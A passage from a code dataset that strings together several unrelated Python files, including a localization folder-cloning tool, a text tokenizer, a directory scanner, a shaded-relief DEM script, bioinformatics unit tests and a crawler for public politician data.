        """ Copies subfolders of added folders to a particular destination folder (for a particular locale).
        If there is more than one root folder to copy, each root folder is created inside of the destination folder.
        If there is only one root folder to copy, only the subdirectories are copied.

        Returns True if any folder was created, False otherwise.
        """
        try:
            if not folders_map or not len(folders_map):
                logger.warning("No folders to clone for locale "+str(locale)+".")
                return
            folder_created = False
            prefix_folder = False
            if not os.path.exists(dest_path):
                os.mkdir(dest_path)
                folder_created = True
            # With multiple roots (or copy_root), each root folder is
            # recreated inside dest_path; otherwise only subfolders are.
            if len(folders_map) > 1 or copy_root:
                prefix_folder = True
            for root_folder in folders_map:
                if prefix_folder:
                    new_root_path = dest_path + os.sep + root_folder
                    if not os.path.exists(new_root_path):
                        os.mkdir(new_root_path)
                        folder_created = True
                    # NOTE(review): folders_map values may be None (see
                    # get_sub_folders); this branch does not guard against
                    # that, unlike the else branch below — confirm intended.
                    for folder in folders_map[root_folder]:
                        new_sub_root_path = dest_path + os.sep + root_folder + os.sep + folder
                        if not os.path.exists(new_sub_root_path):
                            os.mkdir(new_sub_root_path)
                            folder_created = True
                else:
                    if folders_map[root_folder]:
                        for folder in folders_map[root_folder]:
                            new_path = dest_path + os.sep + folder
                            if not os.path.exists(new_path):
                                os.mkdir(new_path)
                                folder_created = True
        except IOError as e:
            print(e.errno)
            print(e)
        # NOTE(review): if the IOError fires before folder_created is
        # assigned, this line raises NameError; also the assignment is a
        # no-op (folder_created is already a bool) — looks like leftover code.
        if folder_created != True:
            folder_created = False
        return folder_created

    def clone_action(self, folders, copy_root):
        """Clones the subfolder trees of `folders` (or all tracked folders
        if empty) into each watched locale's destination folder."""
        try:
            if not len(self.watch_locales) or self.watch_locales == set(['[]']):
                logger.warning("There are no locales for which to clone. You can add locales using 'ltk config -t'.")
                return
            folders_map = {}
            are_added_folders = False
            if not folders:
                # No explicit folders: fall back to the tracked folder list.
                folders = self.folder_manager.get_file_names()
                are_added_folders = True
            for folder in folders:
                folder_paths = folder.split(os.sep)
                # Tracked folders are stored relative to the project path.
                if are_added_folders:
                    folder = os.path.join(self.path,folder)
                # Keyed by the folder's basename; value is its subfolder list.
                folders_map[folder_paths[len(folder_paths)-1]] = self.get_sub_folders(folder)
            cloned_folders = False
            for locale in self.watch_locales:
                # Destination preference: configured locale folder, then
                # download dir + locale, then project path + locale.
                dest_path = ""
                if locale in self.locale_folders:
                    dest_path = self.locale_folders[locale]
                else:
                    if self.download_dir and self.download_dir != 'null':
                        dest_path = os.path.join(os.path.join(self.path,self.download_dir),locale)
                    else:
                        dest_path = os.path.join(self.path,locale)
                dest_path = os.path.join(self.path,dest_path)
                if self.clone_folders(dest_path, folders_map, locale, copy_root):
                    logger.info("Cloned locale " + str(locale) + " at " + dest_path)
                    cloned_folders = True
            if not len(self.folder_manager.get_file_names()):
                logger.warning("There are no added folders to clone.")
                return
            if not cloned_folders:
                logger.info("All locales have already been cloned.")
                return
        except Exception as e:
            log_error(self.error_file_name, e)
            logger.error("Error on clean: "+str(e))

    def get_sub_folders(self, patterns):
        """ gets all sub-folders matching pattern from root
        pattern supports any unix shell-style wildcards (not same as RE)
        returns the relative paths starting from each pattern"""
        cwd = os.getcwd()
        if isinstance(patterns,str):
            patterns = [patterns]
        allPatterns = []
        # Expand wildcard patterns into concrete directories first.
        if isinstance(patterns,list) or isinstance(patterns,tuple):
            for pattern in patterns:
                basename = os.path.basename(pattern)
                if basename and basename != "":
                    allPatterns.extend(self.getRegexDirs(pattern,cwd))
                else:
                    allPatterns.append(pattern)
        else:
            basename = os.path.basename(patterns)
            if basename and basename != "":
                allPatterns.extend(self.getRegexDirs(patterns,cwd))
            else:
                allPatterns.append(patterns)
        matched_dirs = []
        for pattern in allPatterns:
            path = os.path.abspath(pattern)
            # check if pattern contains subdirectory
            if os.path.exists(path):
                if os.path.isdir(path):
                    for root, subdirs, files in os.walk(path):
                        split_path = root.split(os.sep)
                        for subdir in subdirs:
                            # Record the path relative to the matched root.
                            matched_dirs.append(os.path.join(root,subdir).replace(str(path)+os.sep,""))
            else:
                logger.info("Directory not found: "+pattern)
        # None (not []) signals "no subfolders" to clone_folders.
        if len(matched_dirs) == 0:
            return None
        return matched_dirs

    def getRegexDirs(self, pattern,path):
        """Expands a shell-style wildcard pattern into matching directory
        paths under `path` (returns the pattern as-is if it has no '*')."""
        dir_name = os.path.dirname(pattern)
        if dir_name:
            path = os.path.join(path,dir_name)
        pattern_name = os.path.basename(pattern)
        matched_dirs = []
        if pattern_name and not "*" in pattern:
            # Literal name: nothing to expand.
            return [pattern]
        for path, subdirs, files in os.walk(path):
            for dn in fnmatch.filter(subdirs, pattern):
                matched_dirs.append(os.path.join(path, dn))
        print("matched dirs: "+str(matched_dirs))
        return matched_dirs
| StarcoderdataPython |
6640881 | <filename>documenthandler/dparser.py
#!/usr/bin/env python3
import hashlib
import logging
import os
import re
from documenthandler.dreader import DocumentReader
from utilities.consts import VALID_PUNCTUATION
from utilities.utils import remove_stop_words, remove_punct, lower_case_values
class DocumentParser:
    """Parses a .txt document into a cleaned, lower-cased, stop-word-free
    list of word tokens."""

    def __init__(self, path_to_file: str):
        logging.info('Parsing file.... %s' % (path_to_file))
        # Only plain-text documents are supported.
        if os.path.splitext(path_to_file)[1] != '.txt':
            logging.error('File unsupported format.... %s' % path_to_file)
            raise FileNotFoundError('File unsupported format....')
        self.__file_name = os.path.basename(path_to_file)
        self.__dreader = DocumentReader(path_to_file)
        # The reader yields the whole document content as one string.
        self.__doc_content = next(self.__dreader.read_doc())
        # XML entities stripped before tokenization.
        # NOTE(review): this string (and the &lt;/&gt; patterns in
        # __cleanup) appear HTML-entity-mangled in the archived copy;
        # reconstructed here from the evident intent — verify upstream.
        self.__xml_entities = "&amp;|&quot;|&apos;"
        # Document id derived from the file NAME, not the contents.
        self.__file_hash = hashlib.sha1(self.__file_name.encode('utf-8')).hexdigest()
        self.__words = []
        #
        # Regex:
        # (?:http|ftp|https):\/\/(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+ -- URL
        # [\d]+(?:\-|\/)[\d]+(?:\-|\/)[\d]+ -- date
        # [\d.,]+ -- numbers with dot or comma (e.g: 1.20; 1,20)
        # [A-Z][.A-Z]+\\b\\.* -- Job Titles (e.g: Dr.)
        # w+[-']*\w+ -- hyphenated words (e.g: sugar-free)
        # [^\s]+ -- everything except whitespace character
        #
        self.__regex_pattern = "(?:http|ftp|https):\/\/(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+|[\d]+(?:\-|\/)[\d]+(?:\-|\/)[\d]+|[\d.,]+|[A-Z][.A-Z]+\\b\\.*|\w+[-']*\w+|[^\s]+"

    def __cleanup(self) -> list:
        """
        Remove unwanted chars from the doc content.
        Applies a regex to parse and tokenize text
        :return: list of tokens
        """
        # XML entities removal
        altered_content = re.sub(self.__xml_entities, "", self.__doc_content)
        altered_content = re.sub("&lt;", "lower than", altered_content)
        altered_content = re.sub("&gt;", "greater than", altered_content)
        # Multiple dots repetition. Replaced by one.
        altered_content = re.sub(r'\.+', ".", altered_content)
        # Characters repetition: 2+ times
        for punct in iter(VALID_PUNCTUATION):
            # URL exception: keep '//' so URLs survive until tokenization.
            if punct != '\/':
                altered_content = re.sub("[" + punct + "]{2,}", "", altered_content)
        tokens = re.findall(pattern=self.__regex_pattern, string=altered_content)
        # Remove tokens with puncts
        tokens = remove_punct(tokens=tokens)
        # Lower case content
        tokens = lower_case_values(tokens=tokens)
        # Remove stopwords
        tokens = remove_stop_words(tokens=tokens)
        return tokens

    def document_id_hash(self) -> str:
        """
        :return: SHA1 hash of the document's file name (document id)
        """
        return self.__file_hash

    def document_name(self) -> str:
        """
        :return: the document's base file name
        """
        return self.__file_name

    def process(self) -> None:
        """
        Fires document parser; results are available via words().
        :return:
        """
        logging.info('Processing file... %s' % (self.__file_name))
        self.__words = self.__cleanup()

    def words(self) -> list:
        """
        :return: list of words from the document (empty before process())
        """
        return self.__words
| StarcoderdataPython |
8060699 | import os
import stat
import time
import json
import sys
import re
import hashlib
def calculateDirectorySizes(directory):
    """Recursively fill in 'size' for every directory entry and return
    the total size of all entries in `directory`."""
    total = 0
    for entry in directory.values():
        if entry['isDir']:
            # A directory's size is the recursive sum of its children.
            entry['size'] = calculateDirectorySizes(entry['children'])
        total += entry['size']
    return total
def filterDirectory(include, exclude, directory):
    """Return a filtered copy of `directory`.

    An entry is dropped if it matches an exclude regex; it is kept if it
    matches an include regex itself or has a surviving descendant.
    """
    kept = {}
    for name, fileId in directory.items():
        if not checkExcludeFilter(exclude, fileId['path']):
            continue
        matchesHere = checkIncludeFilter(include, fileId['path'])
        keptChildren = filterDirectory(include, exclude, fileId['children'])
        if not matchesHere and not keptChildren:
            continue
        # Shallow-copy the entry, substituting the filtered children.
        entry = dict(fileId)
        entry['children'] = keptChildren
        kept[name] = entry
    return kept
def indexDirectory(directory):
    """Flatten a nested directory tree into a {path: fileId} mapping."""
    index = {}
    for fileId in directory.values():
        index[fileId['path']] = fileId
        # Recurse so every descendant is addressable by its full path.
        index.update(indexDirectory(fileId['children']))
    return index
def printIndexResult(index):
    """Print summary statistics for a path index: file count and total
    size, plus folder and non-empty-folder counts."""
    files = [entry for entry in index.values() if not entry['isDir']]
    folders = [entry for entry in index.values() if entry['isDir']]
    print('%i files (%s) and %i folders (%i non-empty) found.' % (
        len(files),
        formatBytes(sum(entry['size'] for entry in files)),
        len(folders),
        sum(1 for entry in folders if entry['children']),
    ))
def formatBytes(bytes):
    """Format a byte count with a binary-scaled unit (Byte, kB, ... TB).

    Plain byte counts are printed without decimals; scaled values get
    two decimal places.
    """
    units = ['Byte', 'kB', 'MB', 'GB', 'TB']
    value = bytes
    unit_index = 0
    while unit_index + 1 < len(units) and value >= 1024.0:
        value /= 1024.0
        unit_index += 1
    pattern = '%.0f %s' if unit_index == 0 else '%.2f %s'
    return pattern % (value, units[unit_index])
def formatSeconds(seconds):
    """Format a duration using the largest unit whose threshold it
    reaches (s, min, h, d, years)."""
    units = ['s', 'min', 'h', 'd', 'years']
    factors = [60.0, 60.0, 24.0, 365.25]
    assert len(units) == len(factors) + 1
    value = seconds
    idx = 0
    while idx < len(factors) and value >= factors[idx]:
        value /= factors[idx]
        idx += 1
    return '%.2f %s' % (value, units[idx])
def checkIncludeFilter(include, path):
    """Return True when `path` matches at least one include regex, or
    when no include filters were given at all."""
    if not include:
        return True
    return any(regex.search(path) for regex in include)
def checkExcludeFilter(exclude, path):
    """Return False when `path` matches any exclude regex, True otherwise."""
    return not any(regex.search(path) for regex in exclude)
def rewritePaths(directory, oldRootLen, newRoot):
    """Rebase every 'path' in the tree onto `newRoot`, stashing the
    original path in 'oriPath'."""
    for fileId in directory.values():
        fileId['oriPath'] = fileId['path']
        # Drop the old root prefix and prepend the new one.
        fileId['path'] = newRoot + fileId['path'][oldRootLen:]
        rewritePaths(fileId['children'], oldRootLen, newRoot)
def getFileId(root, filename):
    """Stat `filename` under `root` and return its metadata record.

    On stat failure an entry is still returned, with zeroed size and
    mtime, so one unreadable file does not abort a scan.
    """
    path = os.path.join(root, filename)
    entry = {
        'name': filename,
        'path': path,
        'isDir': False,
        'modified': 0,
        'size': 0,
    }
    try:
        info = os.stat(path)
    except OSError:
        print('Could not access %s' % path)
        return entry
    entry['isDir'] = stat.S_ISDIR(info.st_mode)
    entry['modified'] = info.st_mtime
    entry['size'] = info.st_size
    return entry
def getSources(patternList, commonRoot):
    """Parse source specs of the form 'old::new' into (old, new) tuples.

    A spec without '::' is rebased onto `commonRoot`; only one such bare
    spec is allowed, otherwise the program exits with an error.
    """
    if patternList is None:
        return []
    sources = []
    bareSeen = False
    for spec in patternList:
        if '::' in spec:
            parts = spec.split('::')
            assert len(parts) == 2
            sources.append((parts[0], parts[1]))
        else:
            if bareSeen:
                print("Error: you can only specifiy one new root; try to use pattern old:new.")
                sys.exit(1)
            sources.append((commonRoot, spec))
            bareSeen = True
    return sources
def hashFileContents(fileId, sources, contentHashes):
    """SHA1-hash a file's contents into the `contentHashes` cache.

    The cache is keyed by the entry's original path ('oriPath' when the
    tree was rebased). `sources` is a list of (old, new) path prefixes
    used to map the entry's path back to a readable location. Unreadable
    files are recorded with the sentinel hash '0'.
    """
    key = fileId.get('oriPath', fileId['path'])
    if key in contentHashes:
        return
    path = fileId['path']
    for old, new in sources:
        if path.startswith(old):
            path = new + path[len(old):]
            break
    digest = hashlib.sha1()
    try:
        with open(path, 'rb') as f:
            blocksize = 1024 * 1024 * 10
            chunk = f.read(blocksize)
            while len(chunk) > 0:
                digest.update(chunk)
                chunk = f.read(blocksize)
        contentHashes[key] = digest.hexdigest()
    except IOError:
        print('Could not read %s' % path)
        contentHashes[key] = '0'
def isIncluded(fileId, includes):
    """Return True if the entry is one of `includes`, an ancestor
    directory of an included path, or a descendant of one."""
    path = fileId['path']
    if path in includes:
        return True
    for include in includes:
        # Ancestor: a directory on the way down to an included path.
        if fileId['isDir'] and include.startswith(path + '/'):
            return True
        # Descendant: anything below an included directory.
        if path.startswith(include + '/'):
            return True
    return False
def scanIntoMemory(root, onlyScan, skipScan):
    """Scan `root` recursively, honoring include/skip path sets, and
    return the resulting directory tree."""
    # Progress state is shared across the recursion so a heartbeat count
    # can be printed every ~10 seconds on large trees.
    progress = {'lastOutput': time.time(), 'counter': 0}
    return _scanIntoMemory(root, onlyScan, skipScan, progress)
def _scanIntoMemory( root, onlyScan, skipScan, progress ):
directory = {}
try:
dirlist = os.listdir( root )
except OSError:
print( 'Could not access %s' % root )
return directory
for filename in dirlist:
fileId = getFileId( root, filename )
if fileId['path'] in skipScan or (onlyScan and not isIncluded( fileId, onlyScan )):
continue
fileId['children'] = {}
if fileId['isDir']:
fileId['children'] = _scanIntoMemory( fileId['path'], onlyScan, skipScan, progress )
directory[filename] = fileId
progress['counter'] += 1
if time.time() - progress['lastOutput'] > 10:
print( '%i...' % progress['counter'] )
progress['lastOutput'] = time.time()
return directory
def scan(rootGiven, rewriteRoot, name, saveAs, args):
    """Scan a directory tree, or load a previously saved scan.

    Args:
        rootGiven: Directory to scan, or path of a saved JSON scan file.
        rewriteRoot: Optional new root to rebase all paths onto.
        name: Optional display name used in progress output.
        saveAs: Optional path to save a fresh directory scan as JSON.
        args: Parsed CLI args providing only/skip/include/exclude lists.

    Returns:
        A (directory tree, {path: entry} index, common root) tuple.

    Exits the process on invalid input (missing root, conflicting
    filters, everything filtered out).
    """
    root = os.path.abspath(rootGiven.replace('\\', '/'))
    if not os.path.isdir(root):
        if args.only or args.skip:
            print("Error: --only and --skip work only on directory scans.")
            sys.exit(1)
        if saveAs:
            print("Error: scan results can only be saved of directory scans.")
            sys.exit(1)
    if rewriteRoot:
        rootRewritten = os.path.abspath(rewriteRoot.replace('\\', '/'))
    if os.path.isdir(root):
        # Normalize the include/skip path lists to absolute paths.
        if args.only:
            onlyScan = set(map(lambda x: os.path.abspath(x.replace('\\', '/')), args.only))
        else:
            onlyScan = set()
        if args.skip:
            skipScan = set(map(lambda x: os.path.abspath(x.replace('\\', '/')), args.skip))
        else:
            skipScan = set()
        if onlyScan & skipScan:
            print("Error: include and exclude lists have common items.")
            sys.exit(1)
        print("scanning %s..." % (name if name else root))
        directory = scanIntoMemory(root, onlyScan, skipScan)
        if saveAs:
            print("saving to %s..." % saveAs)
            # Bug fix: use a context manager so the output handle is
            # closed (the previous bare open() leaked it).
            with open(saveAs, 'w') as outfile:
                json.dump(directory, outfile, indent=4)
    elif os.path.isfile(root):
        print("loading %s..." % (name if name else root))
        with open(root, 'r') as infile:
            directory = json.load(infile)
    else:
        print("Error: %s does not exist." % root)
        sys.exit(1)
    if args.exclude or args.include:
        # Bug fix: these were 'map(...)' iterators, which Python 3
        # exhausts after a single pass. filterDirectory iterates the
        # filter lists once per entry, so every entry after the first
        # was silently left unfiltered. Materialize them as lists.
        if args.exclude:
            exclude = [re.compile(pattern) for pattern in args.exclude]
        else:
            exclude = []
        if args.include:
            include = [re.compile(pattern) for pattern in args.include]
        else:
            include = []
        print('filtering data...')
        directory = filterDirectory(include, exclude, directory)
        if not directory:
            print("Error: root filtered out.")
            sys.exit(1)
    print('calculating directory sizes...')
    calculateDirectorySizes(directory)
    if rewriteRoot:
        # Derive the common root from any first entry, then rebase.
        firstEntry = directory[list(directory.keys())[0]]
        commonRoot = firstEntry['path'][: len(firstEntry['path']) - len(firstEntry['name'])]
        rewritePaths(directory, len(commonRoot) - 1, rootRewritten)
    firstEntry = directory[list(directory.keys())[0]]
    commonRoot = firstEntry['path'][: len(firstEntry['path']) - len(firstEntry['name'])]
    index = indexDirectory(directory)
    printIndexResult(index)
    if name:
        print('%s root: %s' % (name, firstEntry['path'][:len(commonRoot) - 1]))
    else:
        print('root: %s' % firstEntry['path'][:len(commonRoot) - 1])
    return directory, index, commonRoot
267297 | <reponame>rashidulhasanhridoy/URI-Online-Judge-Problem-Solve-with-Python-3
# Read ten names from standard input (one per line), then print the
# 3rd, 7th and 9th names entered (1-based positions).
names = []
for i in range(10):
    X = str(input(''))
    names.append(X)
print(names[2])
print(names[6])
print(names[8])
84731 | """Utilities to load forcefields based on forcefield names."""
import os
import foyer
def get_ff_path(
    name: str = None,
):
    """Resolve a forcefield name to something foyer can load.

    Parameters
    ----------
    name : str, default=None, optional
        Forcefield file name to load. The built-in foyer forcefields
        ('oplsaa', 'trappe-ua') are returned unchanged; a '*.xml' name
        is resolved relative to this package's xmls directory.

    Returns
    -------
    str
        The forcefield name or the path to the xml file.

    Raises
    ------
    ValueError
        If the name is neither a built-in forcefield nor a .xml file.
    """
    if name in ('oplsaa', 'trappe-ua'):
        # foyer resolves these names internally; pass them through.
        return name
    if os.path.splitext(name)[1] == '.xml':
        package_dir = os.path.dirname(os.path.abspath(__file__))
        return str(package_dir) + "/../xmls/" + name
    raise ValueError("ERROR: This force field is not 'oplsaa' or 'trappe-ua', or does "
                     "not have a .xml after it. "
                     )
def get_molecule_path(mol2_or_smiles_input):
    """Classify a molecule input as a SMILES string or a mol2 file path.

    Parameters
    ----------
    mol2_or_smiles_input : str
        Either a SMILES string (no file extension) or a mol2 file name;
        the file must carry the '.mol2' extension to be read as a file.

    Returns
    -------
    list
        use_smiles : bool
            True if using a smiles string, False for a mol2 file.
        smiles_or_mol2_path_string : str
            The smiles string itself, or the mol2 file name resolved
            relative to this package's molecules directory.

    Raises
    ------
    TypeError
        If the input is not a string, or carries a file extension other
        than '.mol2'.
    """
    if not isinstance(mol2_or_smiles_input, str):
        raise TypeError("ERROR: A string was not entered or the get_molecule_path function.")
    extension = os.path.splitext(mol2_or_smiles_input)[1]
    if extension == '':
        # No extension: treat the whole string as SMILES.
        use_smiles = True
        return [use_smiles, mol2_or_smiles_input]
    if extension == '.mol2':
        # Bug fix: removed the unused 'from src import xmls' import that
        # used to live here — it contributed nothing and raised
        # ImportError whenever the 'src' package was absent, breaking
        # mol2 lookups for no reason.
        use_smiles = False
        smiles_or_mol2_path_string = (
            str(os.path.dirname(os.path.abspath(__file__))) + "/../molecules/" + mol2_or_smiles_input
        )
        return [use_smiles, smiles_or_mol2_path_string]
    raise TypeError("ERROR: For the get_molecule_path function,"
                    "a smiles string or a mol2 file that does not have a .mol2 "
                    "file extension was not found.")
6524562 | <gh_stars>10-100
#!/usr/bin/env python
from nose.tools import assert_equal, assert_true
import numpy as np
import pandas as p
import os
from Bio import SeqIO
from concoct.input import _normalize_per_sample, _normalize_per_contig, generate_feature_mapping, load_composition, _calculate_composition
class TestInput(object):
    """Unit tests for concoct.input helpers (nose-style test class)."""

    def setUp(self):
        # 2x2 matrix reused by both normalization tests.
        self.C = p.DataFrame(np.array([[0., 0.7], [5.5, .7]]))

    def test_normalize_per_contig(self):
        # Expect each row (contig) scaled by its own row sum.
        C_norm = _normalize_per_contig(self.C)
        C_correct = p.DataFrame(np.array([[0., 1.], [5.5/6.2, 0.7/6.2]]))
        assert_true(np.linalg.norm(C_norm - C_correct) < 0.0001)

    def test_normalize_per_samples(self):
        # Expect each column (sample) scaled by its own column sum.
        C_norm = _normalize_per_sample(self.C)
        C_correct = p.DataFrame(np.array([[0., 0.5], [1, 0.5]]))
        assert_true(np.linalg.norm(C_norm - C_correct) < 0.0001)

    def test_generate_feature_mapping(self):
        feature_mapping, counter = generate_feature_mapping(2)
        # 16 dinucleotide keys mapping onto 10 feature indices —
        # presumably reverse-complement collapsing; verify in
        # generate_feature_mapping if this expectation changes.
        assert_equal(counter, 10)
        assert_equal(len(list(feature_mapping.keys())), 16)
        assert_true(('A', 'A') in feature_mapping)

    def test_load_composition(self):
        # Get the directory path of this test file
        f = os.path.dirname(os.path.abspath(__file__))
        # calculate the lengths of the contigs, keeping only those
        # longer than the 1000 bp threshold passed to load_composition
        seqs = SeqIO.parse("{0}/test_data/composition_some_shortened.fa".format(f), "fasta")
        ids = []
        lengths = []
        for s in seqs:
            if len(s) <= 1000:
                continue
            ids.append(s.id)
            lengths.append(len(s))
        c_len = p.Series(lengths, index=ids, dtype=float)
        # Use load_composition to calculate contig lengths
        composition, contig_lengths = load_composition("{0}/test_data/composition_some_shortened.fa".format(f), 4, 1000)
        assert_equal(len(c_len), len(contig_lengths))
        # All equal
        for ix in ids:
            assert_equal(c_len.loc[ix], contig_lengths.loc[ix])

    def test__calculate_composition(self):
        d = os.path.dirname(os.path.abspath(__file__))
        f = "{0}/test_data/composition_some_shortened.fa".format(d)
        seqs = SeqIO.parse(f, "fasta")
        feature_mapping, counter = generate_feature_mapping(4)
        seq_strings = {}
        for i, s in enumerate(seqs):
            seq_strings[s.id] = str(s.seq).upper()
        composition, contig_lengths = _calculate_composition(f, 0, 4)
        # Make sure the count is correct for one specific kmer
        # (the +1 reflects a pseudo-count expected from
        # _calculate_composition).
        kmer_s = ('A', 'C', 'G', 'T')
        for seq_id, s in seq_strings.items():
            c = count_substrings(s, "".join(kmer_s))
            assert_equal(composition.loc[seq_id, feature_mapping[kmer_s]], c + 1)
        # Check that non palindromic kmers works as well: forward and
        # reverse-complement occurrences should be pooled.
        kmer_s = ('A', 'G', 'G', 'G')
        reverse_kmer_s = ('C', 'C', 'C', 'T')
        for seq_id, s in seq_strings.items():
            c_1 = count_substrings(s, "".join(kmer_s))
            c_2 = count_substrings(s, "".join(reverse_kmer_s))
            assert_equal(composition.loc[seq_id, feature_mapping[kmer_s]], c_1 + c_2 + 1)
def count_substrings(s, subs):
    """Count occurrences of *subs* in *s*, including overlapping matches.

    Based on http://stackoverflow.com/a/19848382, adapted so that the next
    search resumes one character after the previous hit (overlaps count).
    """
    total = 0
    position = s.find(subs)
    while position != -1:
        total += 1
        position = s.find(subs, position + 1)
    return total
| StarcoderdataPython |
11347526 | """
Creates a shaded relief ASCII grid
from an ASCII DEM. Also outputs
intermediate grids for slope and
aspect.
"""
# http://git.io/vYwUX
from linecache import getline
import numpy as np
# File name of ASCII digital elevation model
source = "dem.asc"
# File name of the slope grid
slopegrid = "slope.asc"
# File name of the aspect grid
aspectgrid = "aspect.asc"
# Output file name for shaded relief
shadegrid = "relief.asc"
# Shaded elevation parameters
# Sun direction
azimuth = 315.0
# Sun angle
altitude = 45.0
# Elevation exageration
z = 1.0
# Resolution
scale = 1.0
# No data value for output
NODATA = -9999
# Needed for numpy conversions
deg2rad = 3.141592653589793 / 180.0
rad2deg = 180.0 / 3.141592653589793
# Parse the header using a loop and
# the built-in linecache module
# NOTE(review): this assumes the six header lines are single-space separated
# "key value" pairs in the order ncols, nrows, xllcorner, yllcorner,
# cellsize, NODATA_value -- confirm against the actual .asc producer.
hdr = [getline(source, i) for i in range(1, 7)]
values = [float(h.split(" ")[-1].strip()) for h in hdr]
cols, rows, lx, ly, cell, nd = values
xres = cell
yres = cell * -1
# Load the dem into a numpy array
arr = np.loadtxt(source, skiprows=6)
# Exclude 2 pixels around the edges which are usually NODATA.
# Also set up structure for a 3x3 windows to process the slope
# throughout the grid
# window[i] is the DEM shifted by (row, col); stacking the nine shifted
# views lets every interior cell's 3x3 neighbourhood be combined with
# whole-array numpy arithmetic instead of a per-cell Python loop.
window = []
for row in range(3):
    for col in range(3):
        window.append(arr[row:(row + arr.shape[0] - 2),
                      col:(col + arr.shape[1] - 2)])
# Process each cell
# x/y are finite-difference gradient estimates; the middle neighbours are
# weighted twice (window[3]/[5] and window[1]/[7] appear twice each).
x = ((z * window[0] + z * window[3] + z * window[3] + z * window[6]) -
     (z * window[2] + z * window[5] + z * window[5] + z * window[8])) / \
    (8.0 * xres * scale)
y = ((z * window[6] + z * window[7] + z * window[7] + z * window[8]) -
     (z * window[0] + z * window[1] + z * window[1] + z * window[2])) / \
    (8.0 * yres * scale)
# Calculate slope
slope = 90.0 - np.arctan(np.sqrt(x * x + y * y)) * rad2deg
# Calculate aspect
aspect = np.arctan2(x, y)
# Calculate the shaded relief
shaded = np.sin(altitude * deg2rad) * np.sin(slope * deg2rad) + \
    np.cos(altitude * deg2rad) * np.cos(slope * deg2rad) * \
    np.cos((azimuth - 90.0) * deg2rad - aspect)
shaded = shaded * 255
# Rebuild the new header
# The output grids are 2 cells smaller in each dimension than the input,
# so the lower-left corner shifts by the trimmed cells.
header = "ncols {}\n".format(shaded.shape[1])
header += "nrows {}\n".format(shaded.shape[0])
header += "xllcorner {}\n".format(lx + (cell * (cols - shaded.shape[1])))
header += "yllcorner {}\n".format(ly + (cell * (rows - shaded.shape[0])))
header += "cellsize {}\n".format(cell)
header += "NODATA_value {}\n".format(NODATA)
# Set no-data values
# A cell is masked if ANY of its nine neighbours was NODATA in the input.
for pane in window:
    slope[pane == nd] = NODATA
    aspect[pane == nd] = NODATA
    shaded[pane == nd] = NODATA
# Open the output file, add the header, save the slope grid
with open(slopegrid, "wb") as f:
    f.write(bytes(header, 'UTF-8'))
    np.savetxt(f, slope, fmt="%4i")
# Open the output file, add the header, save the aspect grid
with open(aspectgrid, "wb") as f:
    f.write(bytes(header, 'UTF-8'))
    np.savetxt(f, aspect, fmt="%4i")
# Open the output file, add the header, save the array
with open(shadegrid, "wb") as f:
    f.write(bytes(header, 'UTF-8'))
    np.savetxt(f, shaded, fmt="%4i")
| StarcoderdataPython |
11387797 | <filename>opensanctions/crawlers/everypolitician.py<gh_stars>10-100
from datetime import datetime
from opensanctions import helpers as h
def crawl(context):
    """Entry point: fetch the country index and crawl every legislature in it."""
    index = context.http.get(context.dataset.data.url).json()
    for country in index:
        for legislature in country.get("legislatures", []):
            country_code = country.get("code").lower()
            context.log.info("Country: %s" % country_code)
            crawl_legislature(context, country_code, legislature)
    # context.resolver.save()
def crawl_legislature(context, country, legislature):
    """Download one legislature's Popolo JSON and emit its entities.

    Persons and organizations are parsed first so that ``entities`` (a map
    from source id to emitted entity id) is fully populated before
    memberships, which reference both, are resolved.
    """
    # "lastmod" is a unix timestamp (seconds since epoch) in string form.
    lastmod = int(legislature.get("lastmod"))
    lastmod = datetime.utcfromtimestamp(lastmod)
    entities = {}
    url = legislature.get("popolo_url")
    res = context.http.get(url)
    data = res.json()
    for person in data.pop("persons", []):
        parse_person(context, person, country, entities, lastmod)
    for organization in data.pop("organizations", []):
        parse_organization(context, organization, country, entities, lastmod)
    # Index events by id so memberships can look up their legislative period.
    events = data.pop("events", [])
    events = {e.get("id"): e for e in events}
    for membership in data.pop("memberships", []):
        parse_membership(context, membership, entities, events)
def parse_common(context, entity, data, lastmod):
    """Copy fields shared by persons and organizations onto *entity*.

    NOTE: ``data.pop(...)`` deliberately consumes handled keys so callers
    can inspect the leftovers (see the commented-out ``pprint`` blocks in
    the calling functions).
    """
    entity.context["updated_at"] = lastmod.isoformat()
    entity.add("name", data.pop("name", None))
    entity.add("alias", data.pop("sort_name", None))
    for other in data.pop("other_names", []):
        entity.add("alias", other.get("name"))
    # Only a whitelist of link kinds is mapped; everything else is dropped.
    for link in data.pop("links", []):
        url = link.get("url")
        if link.get("note") in ("website", "blog", "twitter", "facebook"):
            entity.add("website", url)
        # elif "Wikipedia (" in link.get("note") and "wikipedia.org" in url:
        #     entity.add("wikipediaUrl", url)
        # elif "wikipedia" in link.get("note") and "wikipedia.org" in url:
        #     entity.add("wikipediaUrl", url)
        # else:
        #     context.log.info("Unknown URL", url=url, note=link.get("note"))
    for ident in data.pop("identifiers", []):
        identifier = ident.get("identifier")
        scheme = ident.get("scheme")
        # Only well-formed wikidata QIDs are kept as identifiers.
        if scheme == "wikidata" and identifier.startswith("Q"):
            entity.add("wikidataId", identifier)
            # from followthemoney.dedupe import Judgement
            # context.resolver.decide(
            #     entity.id,
            #     identifier,
            #     judgement=Judgement.POSITIVE,
            #     user="everypolitician",
            # )
        # else:
        #     pprint(ident)
    for contact_detail in data.pop("contact_details", []):
        value = contact_detail.get("value")
        if "email" == contact_detail.get("type"):
            entity.add("email", h.clean_emails(value))
        if "phone" == contact_detail.get("type"):
            entity.add("phone", h.clean_phones(value))
def parse_person(context, data, country, entities, lastmod):
    """Emit a Person entity for one Popolo person record.

    Registers the emitted id in *entities* keyed by the source person id so
    memberships can refer back to it. Skips unnamed/"unknown" people and
    people filtered out by the PEP cutoff check.
    """
    person_id = data.pop("id", None)
    person = context.make("Person")
    person.id = context.make_slug(person_id)
    person.add("nationality", country)
    name = data.get("name")
    if name is None or name.lower().strip() in ("unknown",):
        return
    parse_common(context, person, data, lastmod)
    person.add("gender", h.clean_gender(data.pop("gender", None)))
    person.add("title", data.pop("honorific_prefix", None))
    person.add("title", data.pop("honorific_suffix", None))
    person.add("firstName", data.pop("given_name", None))
    person.add("lastName", data.pop("family_name", None))
    person.add("fatherName", data.pop("patronymic_name", None))
    person.add("birthDate", data.pop("birth_date", None))
    person.add("deathDate", data.pop("death_date", None))
